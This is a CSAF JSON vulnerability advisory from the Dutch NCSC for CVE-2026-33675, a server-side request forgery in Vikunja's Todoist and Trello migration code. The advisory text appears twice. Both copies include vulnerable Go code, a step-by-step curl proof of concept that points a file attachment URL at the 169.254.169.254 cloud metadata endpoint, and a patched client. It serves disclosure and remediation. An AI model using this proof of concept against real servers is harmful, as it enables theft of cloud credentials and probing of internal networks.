{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33675", "tracking": { "current_release_date": "2026-03-27T19:46:16.766877Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33675", "initial_release_date": "2026-03-24T20:50:39.149133Z", "revision_history": [ { "date": "2026-03-24T20:50:39.149133Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (3).| CWES updated (1)." }, { "date": "2026-03-24T20:50:41.757863Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-24T20:53:16.221677Z", "number": "3", "summary": "Unknown change." }, { "date": "2026-03-24T20:53:31.555336Z", "number": "4", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-24T20:53:33.690675Z", "number": "5", "summary": "NCSC Score updated." }, { "date": "2026-03-25T21:49:52.237829Z", "number": "6", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (5).| CWES updated (1)." }, { "date": "2026-03-25T21:50:00.595567Z", "number": "7", "summary": "NCSC Score updated." }, { "date": "2026-03-26T00:12:47.524933Z", "number": "8", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (4).| CWES updated (1)." }, { "date": "2026-03-26T00:12:54.441785Z", "number": "9", "summary": "NCSC Score updated." }, { "date": "2026-03-26T00:50:05.781149Z", "number": "10", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-26T00:50:15.506238Z", "number": "11", "summary": "NCSC Score updated." }, { "date": "2026-03-27T00:13:43.213556Z", "number": "12", "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (4)." }, { "date": "2026-03-27T00:13:46.362445Z", "number": "13", "summary": "NCSC Score updated." }, { "date": "2026-03-27T19:45:50.111381Z", "number": "14", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-27T19:45:52.167532Z", "number": "15", "summary": "NCSC Score updated." } ], "status": "interim", "version": "15" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=0|<2.2.1", "product": { "name": "vers:unknown/>=0|<2.2.1", "product_id": "CSAFPID-5911160" } } ], "category": "product_name", "name": "api" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<2.2.1", "product": { "name": "vers:unknown/<2.2.1", "product_id": "CSAFPID-5902472" } } ], "category": "product_name", "name": "vikunja" } ], "category": "vendor", "name": "go-vikunja" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<2.2.1", "product": { "name": "vers:unknown/<2.2.1", "product_id": "CSAFPID-5943812", "product_identification_helper": { "cpe": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "vikunja" } ], "category": "vendor", "name": "vikunja" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33675", "cwe": { "id": "CWE-918", "name": "Server-Side Request Forgery (SSRF)" }, "notes": [ { "category": "description", "text": "Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.1, the migration helper functions `DownloadFile` and `DownloadFileWithHeaders` in `pkg/modules/migration/helpers.go` make arbitrary HTTP GET requests without any SSRF protection. When a user triggers a Todoist or Trello migration, file attachment URLs from the third-party API response are passed directly to these functions, allowing an attacker to force the Vikunja server to fetch internal network resources and return the response as a downloadable task attachment. Version 2.2.1 patches the issue.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33675.json" }, { "category": "description", "text": "Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.1, the migration helper functions `DownloadFile` and `DownloadFileWithHeaders` in `pkg/modules/migration/helpers.go` make arbitrary HTTP GET requests without any SSRF protection. When a user triggers a Todoist or Trello migration, file attachment URLs from the third-party API response are passed directly to these functions, allowing an attacker to force the Vikunja server to fetch internal network resources and return the response as a downloadable task attachment. Version 2.2.1 patches the issue.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33675" }, { "category": "description", "text": "## Summary\n\nThe migration helper functions `DownloadFile` and `DownloadFileWithHeaders` in `pkg/modules/migration/helpers.go` make arbitrary HTTP GET requests without any SSRF protection. When a user triggers a Todoist or Trello migration, file attachment URLs from the third-party API response are passed directly to these functions, allowing an attacker to force the Vikunja server to fetch internal network resources and return the response as a downloadable task attachment.\n\n## Details\n\nThe vulnerability exists because the migration HTTP client uses a plain `http.Client{}` with no URL validation, no private IP blocklist, no redirect restrictions, and no response size limit.\n\n**Vulnerable code** in `pkg/modules/migration/helpers.go:38-59`:\n```go\nfunc DownloadFileWithHeaders(url string, headers http.Header) (buf *bytes.Buffer, err error) {\n\treq, err := http.NewRequestWithContext(context.Background(), http.MethodGet, url, nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\t// ... headers added ...\n\thc := http.Client{}\n\tresp, err := hc.Do(req)\n\t// ... no URL validation, no IP filtering ...\n\tbuf = &bytes.Buffer{}\n\t_, err = buf.ReadFrom(resp.Body) // no size limit\n\treturn\n}\n```\n\n**Call site in Todoist migration** (`pkg/modules/migration/todoist/todoist.go:433-435`):\n```go\nif len(n.FileAttachment.FileURL) > 0 {\n\tbuf, err := migration.DownloadFile(n.FileAttachment.FileURL)\n```\n\nThe `FileURL` is deserialized directly from the Todoist Sync API response (`json:\"file_url\"` tag at line 125) with no validation.\n\n**Call sites in Trello migration** (`pkg/modules/migration/trello/trello.go`):\n- Line 263: `migration.DownloadFile(board.Prefs.BackgroundImage)` — board background\n- Line 345: `migration.DownloadFileWithHeaders(attachment.URL, ...)` — card attachments\n- Line 381: `migration.DownloadFile(cover.URL)` — card cover images\n\nNotably, the webhooks module in the same codebase was recently patched (commit `8d9bc3e`) to add SSRF protection using the `daenney/ssrf` library, but this protection was **not applied** to the migration module — making this an incomplete fix.\n\n**Attack flow:**\n1. Attacker creates a Todoist account\n2. Using the Todoist Sync API, attacker creates a note with `file_attachment.file_url` set to an internal URL (e.g., `http://169.254.169.254/latest/meta-data/iam/security-credentials/`)\n3. Attacker authenticates to the target Vikunja instance and initiates a Todoist migration\n4. Vikunja's server fetches the internal URL and stores the response body as a task attachment\n5. Attacker downloads the attachment through the normal Vikunja API, reading the internal resource contents\n\n## PoC\n\n**Prerequisites:**\n- Vikunja instance with Todoist migration enabled (admin has configured OAuth client ID/secret)\n- Authenticated Vikunja user account\n- Todoist account controlled by the attacker\n\n**Step 1: Craft malicious Todoist data**\n\nUsing the Todoist Sync API, create a note with an internal URL as the file attachment:\n\n```bash\ncurl -X POST \"https://api.todoist.com/sync/v9/sync\" \\\n -H \"Authorization: Bearer $TODOIST_TOKEN\" \\\n -d 'commands=[{\n \"type\": \"note_add\",\n \"temp_id\": \"ssrf-test-1\",\n \"uuid\": \"550e8400-e29b-41d4-a716-446655440001\",\n \"args\": {\n \"item_id\": \"'$ITEM_ID'\",\n \"content\": \"test note\",\n \"file_attachment\": {\n \"file_name\": \"metadata.txt\",\n \"file_size\": 1,\n \"file_type\": \"text/plain\",\n \"file_url\": \"http://169.254.169.254/latest/meta-data/\"\n }\n }\n }]'\n```\n\n**Step 2: Trigger migration on Vikunja**\n\n```bash\n# Authenticate to Vikunja\nTOKEN=$(curl -s -X POST \"https://vikunja.example.com/api/v1/login\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"username\":\"attacker\",\"password\":\"password\"}' | jq -r .token)\n\n# Initiate Todoist OAuth flow\ncurl -s \"https://vikunja.example.com/api/v1/migration/todoist/auth\" \\\n -H \"Authorization: Bearer $TOKEN\"\n\n# After OAuth callback, trigger the migration\ncurl -s -X POST \"https://vikunja.example.com/api/v1/migration/todoist/migrate\" \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"code\":\"\"}'\n```\n\n**Step 3: Download the attachment containing internal data**\n\n```bash\n# List tasks to find the attachment ID\ncurl -s \"https://vikunja.example.com/api/v1/projects\" \\\n -H \"Authorization: Bearer $TOKEN\"\n\n# Download the attachment (contains response from internal URL)\ncurl -s \"https://vikunja.example.com/api/v1/tasks//attachments/\" \\\n -H \"Authorization: Bearer $TOKEN\" -o metadata.txt\n\ncat metadata.txt\n# Expected: cloud instance metadata, internal service responses, etc.\n```\n\n## Impact\n\nAn authenticated attacker can:\n\n- **Read cloud instance metadata**: Access `http://169.254.169.254/` to retrieve IAM credentials, instance identity, and configuration data on AWS/GCP/Azure deployments\n- **Probe internal network services**: Map internal infrastructure by making requests to RFC1918 addresses (10.x, 172.16.x, 192.168.x)\n- **Access internal APIs**: Reach internal services that trust requests from the Vikunja server's network position\n- **Denial of service**: Since `buf.ReadFrom(resp.Body)` has no size limit, pointing to a large or streaming resource causes unbounded memory allocation on the Vikunja server\n\nThe attack requires the target Vikunja instance to have Todoist or Trello migration enabled (requires admin configuration of OAuth credentials), but this is a standard deployment configuration.\n\n## Recommended Fix\n\nApply the same SSRF protection already used for webhooks (`daenney/ssrf`) to the migration HTTP clients. In `pkg/modules/migration/helpers.go`:\n\n```go\nimport (\n \"github.com/daenney/ssrf\"\n \"code.vikunja.io/api/pkg/config\"\n)\n\nfunc safeMigrationClient() *http.Client {\n s, _ := ssrf.New(ssrf.WithAnyPort())\n return &http.Client{\n Transport: &http.Transport{\n DialContext: (&net.Dialer{\n Control: s.Safe,\n }).DialContext,\n },\n }\n}\n\nfunc DownloadFileWithHeaders(url string, headers http.Header) (buf *bytes.Buffer, err error) {\n req, err := http.NewRequestWithContext(context.Background(), http.MethodGet, url, nil)\n if err != nil {\n return nil, err\n }\n for key, h := range headers {\n for _, hh := range h {\n req.Header.Add(key, hh)\n }\n }\n\n hc := safeMigrationClient()\n resp, err := hc.Do(req)\n if err != nil {\n return nil, err\n }\n defer resp.Body.Close()\n\n // Limit response body to 100MB to prevent memory exhaustion\n buf = &bytes.Buffer{}\n _, err = buf.ReadFrom(io.LimitReader(resp.Body, 100*1024*1024))\n return\n}\n```\n\nApply the same pattern to `DoGetWithHeaders` and `DoPostWithHeaders` in the same file.", "title": "github - https://api.github.com/advisories/GHSA-g66v-54v9-52pr" }, { "category": "description", "text": "## Summary\n\nThe migration helper functions `DownloadFile` and `DownloadFileWithHeaders` in `pkg/modules/migration/helpers.go` make arbitrary HTTP GET requests without any SSRF protection. When a user triggers a Todoist or Trello migration, file attachment URLs from the third-party API response are passed directly to these functions, allowing an attacker to force the Vikunja server to fetch internal network resources and return the response as a downloadable task attachment.\n\n## Details\n\nThe vulnerability exists because the migration HTTP client uses a plain `http.Client{}` with no URL validation, no private IP blocklist, no redirect restrictions, and no response size limit.\n\n**Vulnerable code** in `pkg/modules/migration/helpers.go:38-59`:\n```go\nfunc DownloadFileWithHeaders(url string, headers http.Header) (buf *bytes.Buffer, err error) {\n\treq, err := http.NewRequestWithContext(context.Background(), http.MethodGet, url, nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\t// ... headers added ...\n\thc := http.Client{}\n\tresp, err := hc.Do(req)\n\t// ... no URL validation, no IP filtering ...\n\tbuf = &bytes.Buffer{}\n\t_, err = buf.ReadFrom(resp.Body) // no size limit\n\treturn\n}\n```\n\n**Call site in Todoist migration** (`pkg/modules/migration/todoist/todoist.go:433-435`):\n```go\nif len(n.FileAttachment.FileURL) > 0 {\n\tbuf, err := migration.DownloadFile(n.FileAttachment.FileURL)\n```\n\nThe `FileURL` is deserialized directly from the Todoist Sync API response (`json:\"file_url\"` tag at line 125) with no validation.\n\n**Call sites in Trello migration** (`pkg/modules/migration/trello/trello.go`):\n- Line 263: `migration.DownloadFile(board.Prefs.BackgroundImage)` — board background\n- Line 345: `migration.DownloadFileWithHeaders(attachment.URL, ...)` — card attachments\n- Line 381: `migration.DownloadFile(cover.URL)` — card cover images\n\nNotably, the webhooks module in the same codebase was recently patched (commit `8d9bc3e`) to add SSRF protection using the `daenney/ssrf` library, but this protection was **not applied** to the migration module — making this an incomplete fix.\n\n**Attack flow:**\n1. Attacker creates a Todoist account\n2. Using the Todoist Sync API, attacker creates a note with `file_attachment.file_url` set to an internal URL (e.g., `http://169.254.169.254/latest/meta-data/iam/security-credentials/`)\n3. Attacker authenticates to the target Vikunja instance and initiates a Todoist migration\n4. Vikunja's server fetches the internal URL and stores the response body as a task attachment\n5. Attacker downloads the attachment through the normal Vikunja API, reading the internal resource contents\n\n## PoC\n\n**Prerequisites:**\n- Vikunja instance with Todoist migration enabled (admin has configured OAuth client ID/secret)\n- Authenticated Vikunja user account\n- Todoist account controlled by the attacker\n\n**Step 1: Craft malicious Todoist data**\n\nUsing the Todoist Sync API, create a note with an internal URL as the file attachment:\n\n```bash\ncurl -X POST \"https://api.todoist.com/sync/v9/sync\" \\\n -H \"Authorization: Bearer $TODOIST_TOKEN\" \\\n -d 'commands=[{\n \"type\": \"note_add\",\n \"temp_id\": \"ssrf-test-1\",\n \"uuid\": \"550e8400-e29b-41d4-a716-446655440001\",\n \"args\": {\n \"item_id\": \"'$ITEM_ID'\",\n \"content\": \"test note\",\n \"file_attachment\": {\n \"file_name\": \"metadata.txt\",\n \"file_size\": 1,\n \"file_type\": \"text/plain\",\n \"file_url\": \"http://169.254.169.254/latest/meta-data/\"\n }\n }\n }]'\n```\n\n**Step 2: Trigger migration on Vikunja**\n\n```bash\n# Authenticate to Vikunja\nTOKEN=$(curl -s -X POST \"https://vikunja.example.com/api/v1/login\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"username\":\"attacker\",\"password\":\"password\"}' | jq -r .token)\n\n# Initiate Todoist OAuth flow\ncurl -s \"https://vikunja.example.com/api/v1/migration/todoist/auth\" \\\n -H \"Authorization: Bearer $TOKEN\"\n\n# After OAuth callback, trigger the migration\ncurl -s -X POST \"https://vikunja.example.com/api/v1/migration/todoist/migrate\" \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"code\":\"\"}'\n```\n\n**Step 3: Download the attachment containing internal data**\n\n```bash\n# List tasks to find the attachment ID\ncurl -s \"https://vikunja.example.com/api/v1/projects\" \\\n -H \"Authorization: Bearer $TOKEN\"\n\n# Download the attachment (contains response from internal URL)\ncurl -s \"https://vikunja.example.com/api/v1/tasks//attachments/\" \\\n -H \"Authorization: Bearer $TOKEN\" -o metadata.txt\n\ncat metadata.txt\n# Expected: cloud instance metadata, internal service responses, etc.\n```\n\n## Impact\n\nAn authenticated attacker can:\n\n- **Read cloud instance metadata**: Access `http://169.254.169.254/` to retrieve IAM credentials, instance identity, and configuration data on AWS/GCP/Azure deployments\n- **Probe internal network services**: Map internal infrastructure by making requests to RFC1918 addresses (10.x, 172.16.x, 192.168.x)\n- **Access internal APIs**: Reach internal services that trust requests from the Vikunja server's network position\n- **Denial of service**: Since `buf.ReadFrom(resp.Body)` has no size limit, pointing to a large or streaming resource causes unbounded memory allocation on the Vikunja server\n\nThe attack requires the target Vikunja instance to have Todoist or Trello migration enabled (requires admin configuration of OAuth credentials), but this is a standard deployment configuration.\n\n## Recommended Fix\n\nApply the same SSRF protection already used for webhooks (`daenney/ssrf`) to the migration HTTP clients. In `pkg/modules/migration/helpers.go`:\n\n```go\nimport (\n \"github.com/daenney/ssrf\"\n \"code.vikunja.io/api/pkg/config\"\n)\n\nfunc safeMigrationClient() *http.Client {\n s, _ := ssrf.New(ssrf.WithAnyPort())\n return &http.Client{\n Transport: &http.Transport{\n DialContext: (&net.Dialer{\n Control: s.Safe,\n }).DialContext,\n },\n }\n}\n\nfunc DownloadFileWithHeaders(url string, headers http.Header) (buf *bytes.Buffer, err error) {\n req, err := http.NewRequestWithContext(context.Background(), http.MethodGet, url, nil)\n if err != nil {\n return nil, err\n }\n for key, h := range headers {\n for _, hh := range h {\n req.Header.Add(key, hh)\n }\n }\n\n hc := safeMigrationClient()\n resp, err := hc.Do(req)\n if err != nil {\n return nil, err\n }\n defer resp.Body.Close()\n\n // Limit response body to 100MB to prevent memory exhaustion\n buf = &bytes.Buffer{}\n _, err = buf.ReadFrom(io.LimitReader(resp.Body, 100*1024*1024))\n return\n}\n```\n\nApply the same pattern to `DoGetWithHeaders` and `DoPostWithHeaders` in the same file.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-g66v-54v9-52pr.json?alt=media" }, { "category": "description", "text": "Vikunja has SSRF via Todoist/Trello Migration File Attachment URLs that Allows Reading Internal Network Resources in code.vikunja.io/api.\n\nNOTE: The source advisory for this report contains additional versions that could not be automatically mapped to standard Go module versions.\n\n(If this is causing false-positive reports from vulnerability scanners, please suggest an edit to the report.)\n\nThe additional affected modules and versions are: code.vikunja.io/api before v2.2.1.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4851.json?alt=media" }, { "category": "other", "text": "0.00034", "title": "EPSS" }, { "category": "other", "text": "3.4", "title": "NCSC Score" }, { "category": "other", "text": "Exploit code publicly available, There is exploit data available from source Nvd, The value of the most recent CVSS (V3) score, The value of the most recent EPSS score, Is related to (a version of) an uncommon product", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5902472", "CSAFPID-5911160", "CSAFPID-5943812" ] }, "references": [ { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33675.json" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33675" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-g66v-54v9-52pr" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-g66v-54v9-52pr.json?alt=media" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4851.json?alt=media" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-g66v-54v9-52pr" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/go-vikunja/vikunja/commit/93297742236e3d33af72c993e5da960db01d259e" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://vikunja.io/changelog/vikunja-v2.2.2-was-released" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33675" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-g66v-54v9-52pr" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L", "baseScore": 6.4, "baseSeverity": "MEDIUM" }, "products": [ "CSAFPID-5902472", "CSAFPID-5911160", "CSAFPID-5943812" ] } ], "title": "CVE-2026-33675" } ] }